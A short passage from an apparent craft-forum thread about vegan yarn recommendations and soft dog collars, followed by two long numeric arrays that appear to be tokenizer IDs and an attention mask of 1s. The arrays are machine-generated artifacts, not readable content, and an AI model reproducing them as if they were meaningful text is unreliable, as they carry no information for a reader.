so-and-so won't make her sneeze. But as soon as she mentions that she's vegan everyone jumps on her, and most aren't even answering her question! I'm only speaking up because I'd hate for this to conversation to get nasty, and I'd love for Robyn to get some yarn advice; I'm interested too! So, that being said, what are some good yarns that just happen not to include animal products? Aw, your dogs are adorable. I love the idea of soft, light weight, comfy dog collars. I've met some pups whose necks had been rubbed bare by their rough nylon or leather collars! If I was a doggie I'd much prefer this kind of collar.
[ 1, 1763, 679, 590, 11460, 886, 411, 360, 15695, 29879, 29892, 306, 1754, 1023, 474, 27345, 1302, 29920, 583, 448, 896, 29915, 276, 4996, 29892, 871, 3614, 385, 17724, 29892, 322, 508, 679, 366, 7960, 304, 4218, 7200, 9279, 889, 4430, 411, 963, 29889, 13, 13, 29902, 1304, 263, 4766, 393, 306, 18093, 472, 263, 1887, 365, 21554, 363, 6763, 577, 4684, 515, 8360, 5367, 349, 545, 322, 12545, 29889, 1152, 592, 29892, 278, 2898, 342, 760, 1048, 577, 384, 889, 5367, 471, 451, 3005, 5086, 714, 1048, 278, 360, 15695, 29879, 29889, 9603, 292, 278, 540, 295, 925, 2320, 1711, 9559, 746, 306, 5643, 278, 4766, 29889, 887, 925, 817, 304, 9311, 278, 4766, 29991, 13, 13, 3644, 366, 864, 304, 1369, 577, 4684, 29892, 306, 437, 6907, 278, 8360, 5367, 349, 545, 322, 12545, 14893, 1089, 1105, 384, 25860, 313, 1333, 3889, 448, 871, 3625, 1549, 343, 2753, 528, 3554, 29892, 541, 372, 471, 14909, 7088, 372, 363, 592, 467, 1205, 1434, 366, 12500, 297, 29892, 5110, 1438, 6996, 2712, 29901, 13, 13, 29902, 1016, 29915, 29873, 1073, 825, 916, 25078, 1422, 577, 384, 15038, 671, 29892, 541, 1438, 29871, 29945, 892, 8002, 363, 278, 577, 4684, 306, 1754, 29889, 13, 13, 8516, 310, 1438, 13698, 526, 599, 393, 5189, 29892, 541, 372, 1795, 367, 975, 1332, 295, 4056, 304, 5110, 599, 470, 1556, 310, 963, 297, 697, 2060, 29889, 11190, 385, 17724, 29892, 777, 6944, 343, 2753, 29892, 322, 6493, 1732, 597, 1636, 29889, 3959, 5367, 8477, 29889, 510, 322, 366, 881, 367, 2691, 29889, 2296, 1584, 3697, 920, 304, 2507, 263, 6996, 540, 295, 322, 679, 4687, 373, 278, 330, 375, 842, 297, 697, 310, 278, 19707, 29889, 13, 13, 29902, 1754, 278, 19253, 292, 282, 682, 1302, 361, 515, 889, 986, 29891, 363, 590, 937, 1661, 29899, 14494, 29888, 2655, 29892, 322, 372, 471, 1407, 7812, 6375, 29991, 739, 29915, 29879, 4996, 29892, 20751, 292, 29892, 322, 6860, 267, 366, 16415, 29892, 9263, 2129, 322, 474, 29899, 16090, 1728, 22884, 29889, 5282, 18639, 1781, 25078, 304, 505, 29991, 12362, 4766, 1244, 29901, 1732, 597, 1636, 29889, 3959, 986, 29891, 29889, 510, 29914, 29902, 1799, 4462, 4278, 29900, 29941, 29914, 29925, 1299, 29911, 1111, 361, 29889, 1420, 13, 13, 13555, 393, 29892, 306, 1754, 278, 349, 6949, 411, 454, 29888, 517, 369, 343, 2753, 515, 278, 1302, 361, 29889, 450, 4766, 338, 2337, 16526, 2820, 373, 278, 937, 470, 1473, 1813, 310, 8676, 9279, 29889, 2193, 29915, 29879, 2107, 363, 16415, 29892, 9263, 2129, 29892, 322, 18130, 10549, 29889, 13, 13, 13555, 1906, 1023, 9279, 29892, 306, 471, 3748, 363, 577, 4684, 29991, 2688, 6077, 714, 2691, 29991, 2567, 306, 29915, 29885, 2675, 304, 1207, 263, 4996, 889, 4430, 260, 29899, 845, 2728, 29889, 7198, 1906, 1023, 15038, 674, 2367, 366, 599, 263, 2788, 14505, 297, 889, 5367, 16420, 29889, 1126, 1716, 526, 7575, 304, 505, 2820, 29892, 363, 1906, 310, 502, 376, 264, 2212, 5414, 29908, 263, 11220, 13851, 1492, 1286, 856, 13, 13, 29902, 29915, 29885, 451, 697, 304, 380, 361, 280, 263, 1781, 10679, 29892, 541, 338, 445, 3244, 2289, 278, 1900, 2058, 363, 263, 27836, 373, 3692, 13019, 343, 279, 1983, 526, 3165, 1662, 470, 451, 29973, 13, 13, 21860, 948, 4433, 29892, 13, 13, 2182, 866, 13, 13, 25125, 5019, 505, 10529, 363, 1661, 29899, 273, 3039, 343, 2753, 393, 889, 1169, 1532, 322, 3430, 2107, 29892, 306, 626, 1811, 304, 7985, 590, 4029, 466, 787, 29889, 13, 13, 3596, 1183, 338, 3063, 363, 338, 777, 343, 2753, 9848, 29889, 960, 1183, 750, 11682, 599, 15064, 583, 408, 902, 2769, 363, 451, 24507, 304, 671, 281, 1507, 29892, 694, 697, 723, 505, 1898, 304, 7602, 1239, 902, 393, 1183, 29915, 29879, 451, 2289, 599, 15064, 293, 29892, 470, 393, 1183, 29915, 29879, 925, 3984, 262, 15628, 29892, 470, 393, 281, 1507, 515, 5001, 577, 29899, 392, 29899, 578, 2113, 29915, 29873, 1207, 902, 269, 484, 29872, 911, 29889, 1205, 408, 4720, 408, 1183, 26649, 393, 1183, 29915, 29879, 12461, 273, 14332, 432, 17204, 373, 902, 29892, 322, 1556, 9455, 29915, 29873, 1584, 22862, 902, 1139, 29991, 13, 13, 29902, 29915, 29885, 871, 13590, 701, 1363, 306, 29915, 29881, 26277, 363, 445, 304, 14983, 304, 679, 11777, 29891, 29892, 322, 306, 29915, 29881, 5360, 363, 6417, 948, 304, 679, 777, 343, 2753, 9848, 29936, 306, 29915, 29885, 8852, 2086, 29991, 13, 13, 6295, 29892, 393, 1641, 1497, 29892, 825, 526, 777, 1781, 343, 279, 1983, 393, 925, 3799, 451, 304, 3160, 13019, 9316, 29973, 13, 13, 29909, 29893, 29892, 596, 26361, 526, 594, 272, 519, 29889, 306, 5360, 278, 2969, 310, 4964, 29892, 3578, 7688, 29892, 419, 29888, 29891, 11203, 5321, 1503, 29889, 306, 29915, 345, 1539, 777, 2653, 567, 5069, 452, 4684, 750, 1063, 14051, 2580, 16079, 491, 1009, 12164, 302, 2904, 265, 470, 454, 1624, 5321, 1503, 29991, 960, 306, 471, 263, 437, 1505, 347, 306, 29915, 29881, 1568, 5821, 445, 2924, 310, 784, 4675, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]